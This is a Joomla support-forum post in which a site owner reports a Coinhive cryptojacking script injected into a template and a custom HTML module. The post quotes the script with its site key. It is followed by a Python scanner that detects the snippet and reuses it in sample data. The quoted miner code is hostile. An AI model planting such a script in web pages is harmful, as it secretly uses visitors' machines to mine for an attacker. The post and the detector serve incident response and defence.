Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!

TOPIC: Coin Miner (coinhive) attack

Coin Miner (coinhive) attack 6 years 4 months ago #37605

Hello,
Recently two websites I manage were infected by a coin miner script using coinhive.
A script was inserted in the index file of the default template, and in one of the websites the attackers added the script inside a custom HTML module that was assigned to all pages.

Both websites were on the latest Joomla version 3.8.2 with the latest RSFirewall installed.
No other suspicious files were found, just the code below:

<script src="coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner=new CoinHive.Anonymous('5TyEnM2ST715Tbv8nOP3uFzAoEaOXWOT');
miner.start();
</script>

Any ideas how to protect the website from this malware using RSFirewall?
How the heck did they insert the code without changing my passwords and without uploading any suspicious files?
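
An added example, not part of the original post and not RSFirewall code: a small scanner for the two places the post says the snippet was found, the template's index file and a custom HTML module body. The function names are hypothetical, the samples are constructed from the snippet quoted above, and module rows are assumed to have been exported as (id, title, content) from Joomla's `#__modules` table.

```python
import re
from pathlib import Path

# <script src=...> pointing at a coinhive.com host; scheme optional, as in the post.
LOADER_RE = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*["']?((?:https?:)?(?://)?(?:[\w-]+\.)*coinhive\.com/[^"'\s>]*)""",
    re.IGNORECASE)
# new CoinHive.<Class>('<site key>'): capture the key passed to the constructor.
MINER_RE = re.compile(r"""\bCoinHive\s*\.\s*\w+\s*\(\s*["']([^"']+)["']""")

def scan_text(text):
    """Return sorted (line, kind, value) findings for one file or module body."""
    findings = []
    for kind, rx in (("loader", LOADER_RE), ("miner-key", MINER_RE)):
        for m in rx.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, kind, m.group(1)))
    return sorted(findings)

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Scan template files under root; return {path: findings} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

def scan_modules(rows):
    """rows: (id, title, content) tuples exported from the modules table."""
    return {mid: f for mid, _title, body in rows if (f := scan_text(body))}

# Constructed sample: a template index.php carrying the snippet quoted in the post.
SAMPLE_INDEX = """<?php defined('_JEXEC') or die; ?>
<html><body>
<jdoc:include type="component" />
<script src="coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner=new CoinHive.Anonymous('5TyEnM2ST715Tbv8nOP3uFzAoEaOXWOT');
miner.start();
</script>
</body></html>
"""
# Constructed sample rows: one clean module and one injected custom HTML module.
SAMPLE_MODULES = [
    (87, "Footer", "<p>Copyright</p>"),
    (112, "Custom HTML", "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"),
]

if __name__ == "__main__":
    for finding in scan_text(SAMPLE_INDEX):
        print("index.php", *finding)
    print(scan_modules(SAMPLE_MODULES))
```

Run `scan_tree` against the site's `templates` directory and `scan_modules` against a database export; a hit in a module body with no changed files on disk means the content was written through the database or the administrator interface rather than by a file upload.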